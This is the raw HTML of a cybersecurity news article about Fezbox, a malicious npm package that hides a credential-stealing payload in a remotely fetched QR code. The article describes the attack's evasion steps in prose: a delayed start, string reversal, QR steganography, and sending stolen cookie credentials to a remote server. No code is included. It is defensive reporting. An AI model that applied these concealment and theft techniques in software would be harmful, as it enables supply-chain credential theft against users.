Código HTML do Conteúdo

Post: npm Package Uses QR Code Steganography to Steal Credentials - Against Invaders - Notícias de CyberSecurity para humanos.

<div> <div> <div> <div data-edit-folder-name="text" data-index="0" data-layout-id="2" id="layout-ebdc1cdd-2adc-4395-ab61-62b39ee2c3f0"> <p>A malicious npm package named Fezbox has been found using an unusual technique to conceal harmful code.</p> <p>The package employs a QR code as part of its obfuscation strategy, ultimately aiming to steal usernames and passwords from web cookies.</p> <p>The discovery was made by the Socket Threat Research Team.</p> <h2><strong>A New Obfuscation Method</strong></h2> <p>While attackers often rely on methods like string reversal, encoding or encryption to hide malware, Fezbox goes further by embedding a payload inside a QR code. Once activated, the code attempts to extract user credentials from browser cookies and transmit them to a remote server.</p> <p><a href="https://socket.dev/blog/malicious-fezbox-npm-package-steals-browser-passwords-from-cookies-via-innovative-qr-code" target="_self _blank">Socket flagged the package</a> through its AI-based malware scanner, which identified suspicious behaviors hidden beneath seemingly harmless utility functions. The package, which had at least 327 downloads, has since been removed following Socket&rsquo;s petition to the npm security team for its takedown and the suspension of the associated account.</p> <p><em><a href="https://www.infosecurity-magazine.com/news/ghostaction-supply-chain-3000/" target="_blank">Read more on supply chain attacks: GhostAction Supply Chain Attack Compromises 3000+ Secrets</a></em></p> <h2><strong>How the Payload Works</strong></h2> <p>Fezbox presents itself as a JavaScript/TypeScript helper library with features like QR code generation.</p> <p>The documentation does not disclose, however, that the library will fetch a QR code from a remote URL and execute whatever code is inside. After a 120-second delay, the malicious script loads and parses the QR code, then runs the hidden payload.</p> <p>Once decoded, the payload attempts to:</p> <ul> <li> <p>Retrieve a stored username and password from browser cookies</p> </li> <li> <p>Reverse the string &ldquo;drowssap&rdquo; to disguise its intent</p> </li> <li> <p>Send the stolen credentials via HTTPS POST to a server hosted on Railway</p> </li> </ul> <p>According to Socket, the use of multiple obfuscation layers, including string reversal, QR code steganography and payload encryption, demonstrates the actor&rsquo;s focus on stealth.</p> <h2><strong>Lessons for Defenders</strong></h2> <p>Although many modern applications no longer store plain passwords in cookies, the attack highlights the growing creativity in malware design.</p> <p>&ldquo;Using a QR code as a steganographic obfuscation technique is quite clever,&rdquo; the Socket team noted, &ldquo;[It] shows yet again that threat actors will continue to use any and all tools at their disposal.&rdquo;</p> <p>The company also emphasized the importance of automated dependency scanning to catch malicious packages before they are introduced into software projects.</p> </div> </div> </div></div>